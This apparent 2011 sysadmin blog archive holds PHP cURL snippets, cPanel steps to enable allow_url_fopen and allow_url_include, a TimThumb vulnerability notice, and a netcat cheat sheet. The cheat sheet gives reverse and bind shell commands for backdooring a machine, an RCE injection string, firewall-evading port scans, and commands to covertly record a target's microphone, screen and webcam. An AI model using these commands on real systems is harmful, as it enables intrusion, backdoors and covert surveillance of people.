Friday, July 15, 2011

Alternative for file_get_contents()

SkyHi @ Friday, July 15, 2011

cURL is a command line tool for transferring files with URL syntax, supporting FTP, FTPS, HTTP, HTTPS, SCP, SFTP, TFTP, TELNET, DICT, FILE and LDAP. cURL supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading, HTTP form based upload, proxies, cookies, user+password authentication (Basic, Digest, NTLM, Negotiate, kerberos...), file transfer resume, proxy tunneling and other useful tricks.

    1 Examples
        1.1 Fetching a web page
        1.2 Alternative for file_get_contents()
        1.3 Getting binary data
            1.3.1 Images
        1.4 Alternative for file()
        1.5 Wrapping it all in an easy class
    2 See Also
    3 External Links

Fetching a web page

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "");
curl_setopt($ch, CURLOPT_HEADER, 0);

Alternative for file_get_contents()

Instead of:

$file_contents = file_get_contents('');

// display file
echo $file_contents;

Use this:

$ch = curl_init();
$timeout = 5; // set to zero for no timeout
curl_setopt ($ch, CURLOPT_URL, '');
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$file_contents = curl_exec($ch);

// display file
echo $file_contents;

Otherwise if you are getting some errors with the code above, use this:

$site_url = '';
$ch = curl_init();
$timeout = 5; // set to zero for no timeout
curl_setopt ($ch, CURLOPT_URL, $site_url);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

$file_contents = ob_get_contents();

echo $file_contents;

Getting binary data

This script retrieves a remote image and assigns the binary data to the variable $image, before outputting the image to the browser:

$image_url = "";
$ch = curl_init();
$timeout = 0;
curl_setopt ($ch, CURLOPT_URL, $image_url);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

// Getting binary data
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, 1);

$image = curl_exec($ch);

// output to browser
header("Content-type: image/jpeg");
print $image;

Alternative for file()

Instead of:

$lines = file('');

// display file line by line
foreach($lines as $line_num => $line) {
    echo "Line # {$line_num} : ".htmlspecialchars($line)."<br />\n";

Use this:

$ch = curl_init();
$timeout = 5; // set to zero for no timeout
curl_setopt ($ch, CURLOPT_URL, '');
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$file_contents = curl_exec($ch);
$lines = array();
$lines = explode("\n", $file_contents);

// display file line by line
foreach($lines as $line_num => $line) {
    echo "Line # {$line_num} : ".htmlspecialchars($line)."<br />\n";

Wrapping it all in an easy class

Use the following class to make reading/saving remote files easy. This class will automatically delete the temp files downloaded at the end of your PHP script.


class downloader {
    var $tempFolder;
    var $tempFiles = array();

    function __destruct () {
        foreach ($this->tempFiles as $file) {
    function __construct ($temp)
        $this->tempFolder = $temp;
    function get ($url) {
        array_unshift($this->tempFiles, array(
            'extension'=> array_pop(explode('.', $url)),
            'original'=> basename($url),
            'temp'=> $this->tempFolder . md5(microtime()),
        $ch = curl_init($url);
        $fp = fopen($this->tempFiles[0]['temp'], 'w');
        curl_setopt($ch, CURLOPT_FILE, $fp);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        return $this->tempFiles[0]['temp'];
    function read ($index = 0) {
        return file_get_contents($this->tempFiles[$index]['temp']);
    function readArray ($index = 0)
        return file($this->tempFiles[$index]['temp']);
    function listFiles () {
        return $this->tempFiles;
    function save ($path, $index = 0) {
        copy($this->tempFiles[$index]['temp'], (is_dir($path) ? $path . $this->tempFiles[$index]['original'] : $path));

$d = new downloader('/home/<username>/<temp folder>');


See Also

cURL PHP tutorial

External Links

    List of Features
    cURL (Client URL Library) Functions
    List of curl_setopt options
    Resize & Display Remote Photos

Categories: Web Applications | PHP


Thursday, July 14, 2011

find files with specific date and time Recursively

SkyHi @ Thursday, July 14, 2011
 # ls -lR |grep 'Jul  2' > july2mod.txt

Wednesday, July 13, 2011

How to enable allow_url_fopen for a single domain on a cPanel server?

SkyHi @ Wednesday, July 13, 2011

The way to enable allow_url_fopen on a phpsuexec and a non-phpsuexec server is different. For security reasons the option is mostly disabled server wide, however, you can turn it ON for a single domain/account incase it is required.

Here how it needs to be done.
  • On a non phpsuexec server:
Goto the /usr/local/apache/conf/ directory,
# cd /usr/local/apache/conf/
see if you have a “userdata” directory there? If not, create the “userdata/<username>” directory and then the file allowurl.conf inside it. So the complete path should look like:
# pico /usr/local/apache/conf/userdata/<username>/allowurl.conf
and add the following to the file
<IfModule mod_php5.c>
 php_admin_value allow_url_fopen On
 php_admin_value allow_url_include On
Now, edit the Apache configuration file and scroll down to the VirtualHost entry of the domain. Include the path of the above created file in it, as shown below:
Include "/usr/local/apache/conf/userdata/<username>/allowurl.conf"
Save the file and rebuild the apache configuration
# /usr/local/cpanel/bin/apache_conf_distiller --update
# /usr/local/cpanel/bin/build_apache_conf
# /scripts/restartsrv httpd
This will enable allow_url_fopen for that domain.
  • On a PhpSuExec Or SuPHP server:

On a SuPHP enabled server, turning ON allow_url_fopen in the VirtualHost entry won’t work since PHP is not working as a Apache Handler anymore.
In such a case, copy the global php.ini of the server under directory of the domain, say public_html (you need to copy php.ini to the directory, where your script with allow_url_fopen resides)
# cp /usr/local/lib/php.ini /home/<username>/public_html/
Edit the new php.ini file and enable allow_url_fopen in it
allow_url_fopen = On
Save the file. Thats it.
BTW, replace “<username>” with the actual username of the domain wherever stated


The PHP option allow_url_fopen would normally allow a programmer to open, include or otherwise use a remote file using a URL rather than a local file path. For security reasons, AUSWEB has disabled this feature; however, a feature-rich alternative exists in the form of the bundled cURL library

Server-Side Includes
Many developers include files by pointing to a remote URL, even if the file is within the local system. For example:
<?php include(""); ?>
With allow_url_fopen disabled, this method will not work. Instead, the file must be included with a local path, and there are three methods of doing this:
  1. By using a relative path, such as ../includes/example_include.php.
  2. By using an absolute path (also known as relative-from-root), such as /home/username/
  3. By using the PHP environment variable $_SERVER['DOCUMENT_ROOT'], which returns the absolute path to the web root directory. This is by far the best (and most portable) solution. The example that follows shows the environment variable in action:

Processing Differences (and passing variables to an included file)
It is worth mentioning that the alternative solutions presented here will result in a difference in the way the include() function is handled. The alternative solutions all return the PHP code from the included page; however, the now-unavailable remote URL method returns the result from the included page. One result of this behavior is that you cannot pass a querystring using the alternative solutions. You define the variables locally before performing the include:

To achieve the effect of this:
<?php include(""); ?>

You must instead use this:
$var = "example";

Example exploitation
If allow_url_fopen is enabled, this system can be exploited by simply changing the value of the variable in the querystring:

Why is allow_url_fopen disabled?

SkyHi @ Wednesday, July 13, 2011


The PHP parameter allow_url_fopen has been disabled in both our PHP4 and PHP5 environments for the (gs) Grid-Service.
If enabled, allow_url_fopen allows PHP's file functions to retrieve data from remote locations such as an FTP server or web site, and could lead to code injection vulnerabilities. Typically, these code injection vulnerabilities occur from improper input filtering when passing user-provided data to PHP functions. Disabling this function will help considerably in stopping your site(s) from being compromised, as well as help thwart the unauthorized use of our servers for abusive or malicious purposes.

What you should do

We would highly suggest further researching and examining aspects of your site's code that depend on this functionality. There are many safer methods to accomplish the same desired results without this possible security issue.
  • Use a relative path to the file stored locally.
  • Using the PHP environment variable $_SERVER['DOCUMENT_ROOT'], which returns the absolute path to the web root directory.
  • cURL is another method that could be used. (This method is beyond the scope of this article. For more information, please see:
If this software was obtained from a third party, we suggest contacting their developer. These developers can usually be contacted via forums, email or other methods.


You can enable 'allow_url_fopen' by editing your php.ini file. The process is very straightforward; it is as simple as including the following line to your own php.ini file at /home/00000/etc/php.ini. If you are just starting to use a custom php.ini file, you may need to also change the memory_limit value.
allow_url_fopen = On

Tuesday, July 12, 2011

Timthumb.php …many themes

SkyHi @ Tuesday, July 12, 2011
Timthumb is a php script for smart image resizing used on many WordPress themes, timthumb versions 1.24 and lower have numerous vulnerabilities.
Since TimThumb is used by many commercial and free themes makers, this exploit easily effects thousands of sites.

Fix: Check your timthumb.php file , usually within one of your theme’s subdirectory’s the version number is in the file under
define ('VERSION', '1.23');
Download latest timthumb.php from the link below and replace if if your version is below 1.25.
Exploit Type: XSS , DoS.
Version: TimThumb 1.24


Monday, July 11, 2011

Netcat cheat sheet

SkyHi @ Monday, July 11, 2011
Netcat, also known as the Swiss-army knife for TCP/IP is capable of so many wonderful tasks, many people only know a partial amount of the features so I made a special cheat sheet for all the basic and more advanced features it supports.
Contents Introduction
Using files during connections
Port scanning
Banner grabbing


The basics of Netcat can be found in the man page which is good for beginners, you can find the man page for your version of netcat by typing this in the terminal:
$ man nc
If you don't like reading man pages through the terminal you can install the package "man2html" which makes it possible to read the manuals through the browser or just Google the man page with the query "man <program>" ("man nc" in our case).

Make netcat listen for a connection

nc -l <port>
Netcat will start to listen on the defined <port>, as soon as something makes a full 3-way TCP handshake to the port there is the possibility of transferring data, the connection can be closed at any time from both sides; once the connection is closed the netcat process is also stopped and the port will be closed again.

nc -l 1337
1. You may need the -p parameter to define the port; in most versions this is not required (nc -l -p 1337).
2. If you want to force netcat to stay listening after one connection you can use the -k flag. (nc -l -k 1337)
3. Using the -v (verbose) flag will make netcat output who is connecting (over stderr), this is good to know when using the -k flag because it is possible that there are different computers connecting to you.
4. Flags can be parsed in a chain like this: "nc -lkv 1337".

Make netcat connect

nc <computer> <port>

Netcat will establish a 3-way TCP handshake to the defined computer/port, when succeeded you can talk with the computer/port with the keyboard (stdin).

nc 80
1. Adding the "-v" (verbose) flag is a nice check to see if a website is up. Here is an example:
$ nc -v 80
Connection to 80 port [tcp/www] succeeded!

Using files during connections

It is possible to save the data which is send to you or you can give netcat a file which should be sended when a connection is made.
Here is an example on how to save the data which is being send by the server:
$ nc 80 > response
# you can now send data but you won't see the output from the server because it is being redirected to a file.
$ nc 80 > response

$ cat response
HTTP/1.1 200 OK
Date: <timestamp>
Server: Apache
Last-Modified: <timestamp>
Accept-Ranges: bytes
Content-Length: 3383
Connection: close
Content-Type: text/html
It is also possible to give netcat a file which should be pushed over  the connection as soon as netcat connects, here is an example where we  make the local computer listen over port 1337 and netcat will connect to  it and push a file through the connection.

# First we need a file so let's create one already.
$ echo "Hello world" > file
# In another terminal we make netcat listen on port 1337 and wait for the file.
$ nc -l 1337
# Now we are going to connect to the port and push the file through the connection.
$ nc localhost 1337 < file
# Look on in the terminal where you just made netcat listen, here is the output:
$ nc -l 1337
Hello world
# You may have noticed that the connection was terminated, this is normal when you push a file through the connection netcat will terminate it when the eof is reached.
Alright, now let's try to do some cool things with this.
We can transfer files this way by making netcat listen on the first side of the connection and capture it on the other side.

# First make it listen and tell it to capture the output to a file.
$ nc -l 1337 > backup.tar.gz
# Now connect to it and push a file in it
$ nc localhost 1337 < backup.tar.gz
# Now you got a file which is called "backup.tar.gz" and contains the same content on both sides.

Or reversed...
# Now make the server listen and anything that connects to it will get the file backup.tar.gz
$ nc -l 1337 < backup.tar.gz
# On the other side connect and save the contents
$ nc localhost 1337 > backup.tar.gz
# Same result: a copy of backup.tar.gz is made.

You can also monitor files this way:
# Make netcat listen, this time we do it with a pipe symbol, this is just another way to get the job done.
$ tail -f /var/log/apache2/access.log | nc -l 1337
# Connect to it
$ nc localhost 1337
<ip> - - [<timestamp>] <user agent>
<ip> - - [<timestamp>] <user agent>
<ip> - - [<timestamp>] <user agent>
<streaming output of /var/log/apache2/access.log>
# The connection will stay open and if there are any new requests you will immediately receive them.

Here is another very cool example, here we are going live eavesdrop the microphone of the target:
# We are going to use arecord for this and all output will be written to whatever is connected to port 1337.
arecord -f dat -t raw | nc -l 1337
# Now we have to connect to this port with netcat and we want to convert all data which is being send to .ogg format so we can hear it.
nc localhost 1337 | oggenc - -r -o nc.ogg
# Now just open nc.ogg with ogg123/vlc or something you like and you will have a live stream with your target's microphone. It will also save all the data to nc.ogg which is good for when you later want to analyze what people said.

The same method can be used for eavesdropping the screen/webcam/anything you like, just find a nice package which can do the job for you.
For desktop and sound eavesdropping the package "recordmydesktop" is good when it's installed.
Getting a good streaming connection with screen and sound is pretty hard so what I did to get it to work is just make a dumpfile like this:
recordmydesktop --on-the-fly-encoding --overwrite -o /tmp/nc.ogv

And later transfer the entire contents to me the way we earlier transferred files.
nc -l 1337 < /tmp/nc.ogv

Then you can just view the video and recorded sound.
Be sure you don't let the entire hard disk overflow with this because it will stay recording, a simple command can kill the recordmydesktop process again.
$ killall recordmydesktop

Or just find the pid with the program ps and kill the pid.
Eavesdropping the webcam with nc is very detectable due to the blinking light/steady green light on the webcam these days, what you can do is just making pictures which will only make it blink very fast, I you can use various packets for it but I will demonstrate it here with streamer.
# First you make a photo and save it in /tmp/image.jpeg, then you set netcat to listen and let it present the photo once somebody connects to it.
$ while [ 1 ]; do streamer -o /tmp/photo.jpeg; nc -l 1337 < /tmp/photo.jpeg; done
# On the other side you connect to it and save the current image.
$ nc localhost 1337 > image.jpeg
# Now the picture will get updated and when reconnecting you will get a new picture real time.

The same idea can be implemented for screenshots.
# listen
$ while true; do import -window root /tmp/image.png; nc -l 1337 < /tmp/image.png; done
# and connect
$ nc localhost 1337 > image.png
# Screenshot is updated and you can grab a new screenshot.

Portscan a target with netcat

nc -zv <target> <port/port range> 2>&1 | grep succeeded

Netcat will start trying to make full 3-way TCP handshakes over the port/port range.
-> SYN
-> ACK

nmap does it a little bit different and injects a RST packet instead of an ACK, this causes the connection to not fully get established and is way more stealthy.
-> SYN
-> RST
"2>&1" is because we want to redirect stderr (standard error) and stdout (standard output) both to a file, I will be using this a lot in the following port scan examples so remember this.

nc -zv 1-3400 2>&1 | grep succeeded
1. When using something like a PHP RCE exploit and you don't have a streaming connection through a shell it is useful to pipe the output to a file. Here is an example of how to do so:
nc -zv 1-3400 2>&1 | grep succeeded > /tmp/
#Inject it where you got a remote code execution exploit, here is an example:
#'; nc -zv 1-3400 2>&1 | grep succeeded > /tmp/; echo '
#This will happen server side in this example: $ ls '/var/www/images/'; nc -zv 1-3400 2>&1 | grep succeeded > /tmp/; echo '';

Portscan a network range with netcat

method 1, subnet scanning
# We will be scanning the subnet for port 80, results can be found back in /tmp/pscan and it is all multi tasked so this shouldn't take longer than a second or 2.
$ range="10.13.37."; port=80; for host in $(seq 1 255); do multi_task=$(result=$(nc -zv $range$host $port 2>&1 | grep succeeded); if [ -n "$result" ]; then echo $range$host":"$port >> "/tmp/pscan"; fi;) & done

method 2, list based scanning
# You will need a file filled with hosts for this, I used /tmp/hosts which contained:
$ port=80; for host in $(cat /tmp/hosts); do multi_task=$(result=$(nc -zv $host $port 2>&1 | grep succeeded); if [ -n "$result" ]; then echo $host":"$port >> "/tmp/pscan"; fi;) & done
# It's all multi tasked again and the structure is pretty similar to the method 1.

method 3, network subnet scanning all ports on all hosts
Extremely noisy to firewalls and might eat a lot of CPU but it works, you can also save it to a file and issue it with the command "nice -n 20" this makes it a little nicer for your CPU.
$ range="10.13.37."; for host in $(seq 1 255); do multi_task=$(result=$(nc -zv $range$host 1-65535 2>&1 | grep succeeded); if [ -n "$result" ]; then echo $result >> "/tmp/pscan"; fi;) & done

method 4 list based scanning with delay
Some delay between the ports is good for letting the firewalls think there is nothing special going on.
This will scan all the hosts in /tmp/hosts on ports 20-100 with 1 second delay between the ports and save the results to /tmp/pscan.
ports=$(seq 20 100)
for host in $(cat /tmp/hosts); do
 for port in $ports; do
  result=$(nc -zv $range$host $port 2>&1 | grep succeeded);
  if [ -n "$result" ]; then
   echo $range$host":"$port >> "/tmp/pscan";
  sleep 1;

1. If you don't want multi tasked scanning which can be pretty extensive and noisy replace the "& done" for "; done".
2. Adding the -r flag will make the source and or destination port ranges random instead of letting the system assign which ports to use.

Banner grabbing

Port scanning is fun but we can't do a lot with this until we properly fingerprinted the programs behind the ports, this can be done with a technique called banner grabbing.
Now that the scripts are getting bigger and bigger I won't be displaying one liners anymore, you will have to write the files to filenames and execute them.

Here is a script which will port scan and banner grab automatically with netcat.
It will check for the SSH and MySQL version by connecting and saving the results and it will see if the HTTP server is vulnerable to the TRACE method, look in the dumpfile /tmp/bannergrab and look for "<script>alert(123)</script>" if you can find that back you got yourself a vulnerable server.
# You can change this to a port range $(seq 20 25) is port 20-25
ports="22 80 3306";

http_header="HEAD / HTTP/0.1\n\n";

for host in $(seq 137 139); do
 for port in $ports; do
  echo "[+] Testing "$range$host":"$port;
  result=$(nc -zv $range$host $port 2>&1 | grep succeeded);
  if [ -n "$result" ]; then
   echo "\n"$range$host":"$port"\n" >> "/tmp/bannergrab"
   if [ "$port" -eq "22" ]; then
    echo "Found open port "$range$host":"$port" Here might be some SSH server, it echoes the SSH version to you on connecting when lucky.";
    nc -v $range$host $port -w 1 >> "/tmp/bannergrab";
   if [ "$port" -eq "80" ]; then
    echo "Found open port "$range$host":"$port" Trying to fingerprint with HEAD and see if the server is vulnerable to TRACE XSSing";
    echo $http_header | nc -v -w 2 $range$host $port >> "/tmp/bannergrab"
    echo "TRACE / HTTP/1.1\nHost: $range$host\nuser-agent: <script>alert(123)</script>\n\n" | nc -v -w 2 $range$host $port >> "/tmp/bannergrab"
   if [ "$port" -eq "3306"]; then
    echo "Found open port "$range$host":"$port" Possible MySQL installation found, saving the banner for later inspection, the MySQL version can be found in this.";
    nc -v $range$host $port -w 1 >> "/tmp/bannergrab";

Basic netcat backdoor shells

There is a flag "-e" in netcat, with this you can let netcat automatically listen with the specified program, it has been removed because of the security issues related to this, there has been a public exploit exploiting a buffer overflow in this since 2004 on windows and there has not been a patch.
# For *nix systems you can use this:
$ nc -l -e /bin/sh localhost 1337
# And for Windows systems you can use this:
$ nc -l -e cmd.exe cmd.exe 1337

Just another reminder, you might need the -p flag before the port, in the latest versions this is not required but the later versions also don't support the -e flag.
Once you executed this command on the computer you can simply netcat in it and you will have your shell.
You may wonder why a buffer overflow is a problem in a function which is mainly for creating a backdoor, it's because there are mail server scripts and things like that which depend on netcat.

You can also just give it another program for example this would open a port and echo anything back.
$ nc -l -e /bin/cat localhost 1337

Here you don't have supposedly a backdoor running but with the buffer overflow you could exploit it.
Anyway, let's reverse things, listening shells are way too detectable and when there is some basic port forwarding you can't get in already.
This way you will make yourself listen and netcat will connect to you and give you a shell.
# You do:
$ nc -lv 1337
# And on the machine you want to backdoor you do:
$ nc -e /bin/sh <Your IP> 1337

Be sure the remote computer can reach you over that port, when you have a home user setup you probably just have to go inside your router and port forward the port to your computer to make it work.

Better netcat backdoor shells

Since the -e flag has been removed in most versions we have to hack our way around it.
Here is a basic exmple of how to do so:
mkfifo /tmp/pipe;
sh /tmp/pipe | nc -l 1337 > /tmp/pipe

Just connect to it and you got a shell.
Here is the reversed version:
mkfifo /tmp/pipe
sh /tmp/pipe | nc localhost 1338 > /tmp/pipe

Unencrypted shell streams are very easy to sniff, we should encrypt them.
!under consruction! - blowfish encryption
# This script is for the connecting client.


echo $1 > cache_cmd;
openssl enc -bf -pass pass:passwd -in cache_cmd | nc localhost 1337

# This script is for the listening server.


openssl enc -bf -d -in $1 -pass pass:$password -out cache;
cat cache;

#tiny notes
openssl enc -bf -d -in pipe -pass pass:passwd | nc -l 1337 > pipe

openssl enc -bf -pass pass:passwd -in cache_cmd | nc localhost 1337
!under construction!

This cheat sheet is still under construction, I released it so friends can give feedback, if you have feedback or questions or you see errors please let me know through a comment or contact me if you know how (you can always look in the ackack IRC #ackack).